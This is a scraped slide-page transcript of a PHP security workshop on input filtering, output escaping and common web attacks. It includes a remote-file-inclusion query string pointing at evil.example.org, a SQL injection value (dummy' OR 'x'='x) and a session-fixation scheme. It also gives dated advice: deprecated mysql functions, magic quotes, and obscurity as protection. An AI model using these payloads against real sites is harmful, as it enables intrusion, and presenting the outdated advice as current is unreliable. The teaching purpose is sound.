PHP Workshop ‹#› PHP Security. PHP Workshop ‹#› Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER 2.ESCAPE.

Slides:



Advertisements
Similar presentations
Web Security Never, ever, trust user inputs Supankar.
Advertisements

PHP Hypertext Preprocessor Information Systems 337 Prof. Harry Plantinga.
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation.
PHP Workshop ‹#› Forms (Getting data from users).
9/9/2005 Developing "Secure" Web Applications 1 Methods & Concepts for Developing “Secure” Web Applications Peter Y. Hammond, Developer Wasatch Front Regional.
Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.
Stupid Browser Tricks with PHP and JavaScript By Chris Winikka.
Secure Software Engineering: Input Vulnerabilities
PHP Security.
Web forms in PHP Forms Recap  Way of allowing user interaction  Allows users to input data that can then be processed by a program / stored in a back-end.
Lecture 6 – Form processing (Part 1) SFDV3011 – Advanced Web Development 1.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting Cookies & Sessions.
PHP Security Computer Security. overview  Xss, Css  Register_globals  Data Filtering  Sql Injection  Session Fixation.
Intro to PHP A brief overview – Patrick Laverty. What is PHP? PHP (recursive acronym for "PHP: Hypertext Preprocessor") is a widely-used Open Source general-purpose.
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
© All rights reserved. Zend Technologies, Inc. PHP Security Kevin Schroeder Zend Technologies.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
Online Translation Service Capstone Design Eunyoung Ku Jason Roberts Jennifer Pitts Gregory Woodburn Kim Tran.
Accessing MySQL with PHP IDIA 618 Fall 2014 Bridget M. Blodgett.
Lecture 8 – Cookies & Sessions SFDV3011 – Advanced Web Development 1.
BBK P1 Module2010/11 : [‹#›] Forms (Getting data from users)
School of Computing and Information Systems CS 371 Web Application Programming Security Avoiding and Preventing Attacks.
NMD202 Web Scripting Week3. What we will cover today Includes Exercises PHP Forms Exercises Server side validation Exercises.
PHP2010/11 : [‹#›] PHP Security. PHP2010/11 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER.
Web-Based Database Programming with PHP. Dept. of Computing Science, University of Aberdeen2 In this lecture you will learn PHP Basics PHP functions –To.
Prof Frankl, Spring 2008CS Polytechnic University 1 Overview of Web database applications with PHP.
PHP Workshop ‹#› Maintaining State in PHP Part II - Sessions.
HTML, PHP, and MySQL: Putting It All Together. Making a Form Input tags Types: “text” “radio” “checkboxes” “submit”
CSC 2720 Building Web Applications Server-side Scripting with PHP.
CIT 380: Securing Computer SystemsSlide #1 CIT 380: Securing Computer Systems Web Security.
SessionsPHPApril 2010 : [‹#›] Maintaining State in PHP Part II - Sessions.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting PHP & MySQL.
SecurityPHPApril 2010 : [‹#›] PHP Security. SecurityPHPApril 2010 : [‹#›] Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less.
Controlling Web Site Access Using Logins CS 320. Basic Approach HTML form a php page that collects the username and password  Sends them to second PHP.
הרצאה 4. עיבוד של דף אינטרנט דינמי מתוך Murach’s PHP and MySQL by Joel Murach and Ray Harris.  דף אינטרנט דינמי משתנה עפ " י הרצת קוד על השרת, יכול להשתנות.
PHP Error Handling & Reporting. Error Handling Never allow a default error message or error number returned by the mysql_error() and mysql_errno() functions.
Since you’ll need a place for the user to enter a search query. Every form must have these basic components: – The submission type defined with the method.
ITM © Port,Kazman 1 ITM 352 Cookies. ITM © Port,Kazman 2 Problem… r How do you identify a particular user when they visit your site (or any.
PHP Form Processing * referenced from
Security Khaled Al-Sham’aa. What Is Security? Security is a measurement, not a characteristic. Security must be balanced with expense. Security must be.
Session 11: Cookies, Sessions ans Security iNET Academy Open Source Web Development.
10 Tips for Building a Secure PHP Application. Tip 1: Use Proper Error Reporting/Handling  The development process of the application can become very.
PHP: Further Skills 02 By Trevor Adams. Topics covered Persistence What is it? Why do we need it? Basic Persistence Hidden form fields Query strings Cookies.
Radoslav Georgiev Telerik Corporation
SQL Injection. Who Am I? Sean Taylor Computer Science major Software developer Web developer Amateur hacker.
SlideSet #20: Input Validation and Cross-site Scripting Attacks (XSS) SY306 Web and Databases for Cyber Operations.
Group 18: Chris Hood Brett Poche
Building Secure ColdFusion Applications
CSE 154 Lecture 25: web security.
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Introduction to Dynamic Web Programming
World Wide Web policy.
CS 371 Web Application Programming
Chapter 19 PHP Part III Credits: Parts of the slides are based on slides created by textbook authors, P.J. Deitel and H. M. Deitel by Prentice Hall ©
SQL Injection Attacks Many web servers have backing databases
Cross-Site Forgery
CSE 154 Lecture 26: web security.
PHP: Security issues FdSc Module 109 Server side scripting and
Lecture 2 - SQL Injection
Web Programming Language
Lecture 26: Regular Expressions and Security
PHP Forms and Databases.
CSc 337 Lecture 24: Security.
Presentation transcript:

PHP Workshop ‹#› PHP Security

PHP Workshop ‹#› Two Golden Rules 1.FILTER external input Obvious.. $_POST, $_COOKIE, etc. Less obvious.. $_SERVER 2.ESCAPE output Client browser MYSQL database

PHP Workshop ‹#› Two Golden Rules PHP Script FilterEscape Cookie Forms Referer, etc. xhtml MYSQL

PHP Workshop ‹#› Filtering Process by which you inspect data to prove its validity. Adopt a whitelist approach if possible: assume the data is invalid unless you can prove otherwise. Useless unless you can keep up with what has been filtered and what hasn’t…

PHP Workshop ‹#› Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; }

PHP Workshop ‹#› Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } $clean = array(); Initialise an array to store filtered data.

PHP Workshop ‹#› Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } if (ctype_alnum($_POST['username'])) Inspect username to make sure that it is alphanumeric.

PHP Workshop ‹#› Filter example $clean = array(); if (ctype_alnum($_POST['username'])) { $clean['username'] = $_POST['username']; } $clean['username'] = $_POST['username']; If it is, store it in the array.

PHP Workshop ‹#› Escaping Output Process by which you escape characters that have a special meaning on a remote system. Unless you’re sending data somewhere unusual, there is probably a function that does this for you.. The two most common outputs are xhtml to the browser (use htmlentities() ) or a MYSQL db (use mysql_real_escape_string() ).

PHP Workshop ‹#› Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. ";

PHP Workshop ‹#› Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; $xhtml = array(); Initialize an array for storing escaped data.

PHP Workshop ‹#› Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); Escape the filtered username, and store it in the array.

PHP Workshop ‹#› Escape example $xhtml = array(); $xhtml['username'] = htmlentities($clean['username'], ENT_QUOTES, 'UTF-8'); echo " Welcome back, {$xhtml['username']}. "; Send the filtered and escaped username to the client.

PHP Workshop ‹#› That’s it! If you follow these rules religiously, you will produce secure code that is hard to break. If you don’t, you will be susceptible to.. Next: COMMON ATTACK METHODS

PHP Workshop ‹#› Register Globals: Eh? All superglobal variable array indexes are available as variable names.. e.g. in your scripts: $_POST[‘name’] is available as $name $_COOKIE[‘age’] is available as $age Most PHP installations have this option turned off, but you should make sure your code is secure if it is turned on.

PHP Workshop ‹#› Register Globals: Example If you forget to initialise $path, and have register_globals enabled, the page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following: include ' i.e. a malicious user can include any script in your code..

PHP Workshop ‹#› Register Globals: Solution Be aware that with register globals on, any user can inject a variable of any name into your PHP scripts. ALWAYS EXPLICITLY INITIALISE YOUR OWN VARIABLES!

PHP Workshop ‹#› Spoofed Forms: Eh? Be aware that anybody can write their own forms and submit them to your PHP scripts. For example, using a select, checkbox or radio button form input does not guarantee that the data submitted will be one of your chosen options…

PHP Workshop ‹#› Spoofed Forms: Example The form written by a web developer to be submitted to a page: red green blue The user writes their own form to submit to the same page:

PHP Workshop ‹#› Spoofed Forms: Solution Users can submit whatever they like to your PHP page… and it will be accepted as long as it conforms to your rules. Make sure all your rules are checked by the PHP external data filter, don’t rely on a form to exert rules for you.. They can be changed!

PHP Workshop ‹#› Session Fixation: Eh? Session attacks nearly always involve impersonation – the malicious user is trying to ‘steal’ someone else’s session on your site. The crucial bit of information to obtain is the session id, and session fixation is a technique of stealing this id.

PHP Workshop ‹#› Session Fixation: Eh? 1. The malicious user hosts a page with links to your site/ s around spam links to your site with a session id already set. … <a href=“ …

PHP Workshop ‹#› Session Fixation: Eh? 2. A client follows one of these links and is directed to your site, where they login. 3. Now.. the malicious user knows the session id (he/she set it!), and can ‘hijack’ the session by browsing to your site using the same session id. 4. Malicious user is now logged in as one of your legitimate clients. Ooops.

PHP Workshop ‹#› Session Fixation: Solution To protect against this type of attack, first consider that hijacking a session is only really useful after the user has logged in or otherwise obtained a heightened level of privilege. If we regenerate the session identifier whenever there is any change in privilege level (for example, after verifying a username and password), we will have practically eliminated the risk of a successful session fixation attack.

PHP Workshop ‹#› Session Fixation: Solution session_regenerate_id() Conveniently, PHP has a function that does all the work for you, and regenerates the session id. Regenerate the session id using this function before any change in privilege level.

PHP Workshop ‹#› SQL Injection: Eh? The goal of SQL injection is to insert arbitrary data, most often a database query, into a string that’s eventually executed by the database.

PHP Workshop ‹#› SQL Injection: Example Consider this query executed in PHP on a MYSQL db, where the text has been submitted from the user: “SELECT * FROM members WHERE = ‘{$_POST[‘ ’]}’”

PHP Workshop ‹#› SQL Injection: Example The use of $_POST[..] in the query should immediately raise warning flags. Consider if a user submitted the following dummy’ OR ‘x’=‘x The query now becomes, SELECT * FROM members WHERE = ‘dummy’ OR ‘x’=‘x’..which will return the details of all members!

PHP Workshop ‹#› SQL Injection: Solution Filter input data. Quote your data. If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type. Escape your data. For a MySQL db, use the function mysql_real_escape_string()

PHP Workshop ‹#› Accessing Credentials Sometimes you need to store sensitive data on your server such as database passwords, usernames, etc. There are various options…

PHP Workshop ‹#› Accessing Credentials 1.Don’t store passwords in an included file without a *.php extension but in a web accessible directory…! 2.You can store in a *.php file under the root (i.e. web accessible). OK, but not great. If your PHP parse engine fails, this data will be on plain view to the entire world. 3.Better, is to keep as much code as possible, including definition of passwords, in included files outside of the web accessible directories. 4.With an Apache server, there are various techniques to include passwords and usernames as environment variables, accessed in PHP by the $_SERVER superglobal. best worst

PHP Workshop ‹#› Cross-Site Scripting (XSS) This is a good example of why you should always escape all output, even for xhtml… echo " Welcome back, {$_GET['username']}. "; echo " Welcome back,.... ";

PHP Workshop ‹#› XXS: The Solution And again.. Filter input. Escape Output. Be especially careful if you are writing user input to a file, which is later include d into your page.. Without checking, the user can then write their own PHP scripts for inclusion.

PHP Workshop ‹#› The ‘magic’ of PHP Recent versions of PHP have gone some way to tightening security, and one of the newer things is ‘magic quotes’. If turned on, this automatically escapes quotation marks and backslashes in any incoming data. Although useful for beginners, it cannot be relied upon if you want to write portable code.

PHP Workshop ‹#› The ‘magic’ of PHP: banished! To know where you are starting from, you can use the get_magic_quotes_gpc() function to tell if they are on or off. To start from a consistent point, use stripslashes() to remove any escape characters added by ‘magic quotes’. e.g. if (get_magic_quotes_gpc()) { $thing = stripslashes($_POST[‘thing’]); }

PHP Workshop ‹#› Phew.. But don’t panic! Open Source PHP code needs to be rock solid in terms of security, as everyone can look through the code. In your bespoke solutions, malicious users will have to try to guess.. Much harder!

PHP Workshop ‹#› Review Filter Input + Escape Output = Secure Code